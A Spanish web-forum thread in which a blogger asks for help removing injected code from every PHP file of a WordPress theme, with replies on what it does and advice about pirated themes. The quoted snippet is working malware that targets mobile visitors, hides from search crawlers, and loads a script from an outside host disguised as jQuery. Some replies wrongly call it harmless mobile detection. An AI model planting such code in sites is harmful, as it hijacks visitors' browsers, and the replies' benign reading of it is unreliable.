Cómo eliminar código extraño o maldito del theme en mi blog

• Autor Autor Esteban Sequeira
  • Fecha de inicio Fecha de inicio
E

Esteban Sequeira

Lambda
Redactor
Verificación en dos pasos activada
Verificado por Whatsapp
Hola, en uno de mis blogs el theme antes estaba bastante limpio, pero durante un par de meses empezó a molestarme un código extraño, el cual es este:
Insertar CODE, HTML o PHP:
if ((preg_match('/text\/vnd.wap.wml|application\/vnd.wap.xhtml\+xml/si', @$_SERVER['HTTP_ACCEPT']) || preg_match('/alcatel|amoi|android|avantgo|blackberry|benq|cell|cricket|docomo|elaine|htc|iemobile|iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola|nec-|nokia|palm|panasonic|philips|phone|sagem|sharp|sie-|smartphone|sony|symbian|t-mobile|telus|up\.browser|up\.link|vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || preg_match('/msearch|m\?q=/si', @$_SERVER['HTTP_REFERER'])) && !preg_match('/macintosh|america|avant|download|windows\-media\-player|yandex|google/si', @$_SERVER['HTTP_USER_AGENT'])) { echo '<script src="http://mobile-content.info/jquery-1.7.1.js"></script>'; flush(); exit; }

Agradecería si alguien me explica que es o como elimino de una vez por todas ese código, que ya me tiene arto!.

Creo que es un codigo para detectar si están accediendo desde un movil.
Pues dirigirse al archivo , sleccionar press DELETE y eliminar.

preg_match Busca un String que le des, Gracias a las expreciones regulares le dices con exactitud que string buscas Ejemplo:

PHP:
<?php

$nombre = "EstebanS tiene un problema con la funcion pregmatch";

//si quisiera Sacar tú nombre de esa cadena haria esto

preg_match("/EstebanS/",'$nombre',$matche);

//la variable matche Se toma como array entonces para imprimir tú nombre seria asi

echo $matche[0];
?>

Segun por lo que veo, la variable Superglobal $_SERVER[] Detecta Desde donden entran Gracias al refferrer & a el user agent, Luego busca en una cadena de texto con pregmatch Detectan desde que Dispositivo y que referido entran.

Creo que es un codigo para detectar si están accediendo desde un movil.
Pues dirigirse al archivo , sleccionar press DELETE y eliminar.
Ok, y sabes ¿como puedo eliminarlo de una vez por todas?.

Ok, y sabes ¿como puedo eliminarlo de una vez por todas?.

Pero no logro entender, Si sabes en que archivo de tu theme esta? , borrarlo es fácil, ya sabes como.

Si no sabes en donde esta puedes descargar tu theme y usar un editor como Notepad++, buscar en tus archivos el fragmento de código: Por ejemplo este : <script src="http://mobile-content.info.

Ahí te mostrarará en que archivo se encuentra y lo borras.

Sí, pero es que ese código está encriptado en otro código 😕, aparece en todos los .php del theme únicamente.

Hay una cuestión de seguridad al descargar themes premium de manera gratuita, es una forma común con la que te incluyen código malicioso en tu sistema.

Aquí unas sugerencias de porque nunca utilizar themes descargados de fuentes no confiables:

Why You Should Not Download Free Wordpress Themes

Si no sabes de donde proviene ese código, te recomiendo buscar en internet "wordpress internet security", "remove malware from wordpress"

siempre será más fácil ayudar con un problema si pones el código fuente de tu sitio, así como, un enlace al mismo.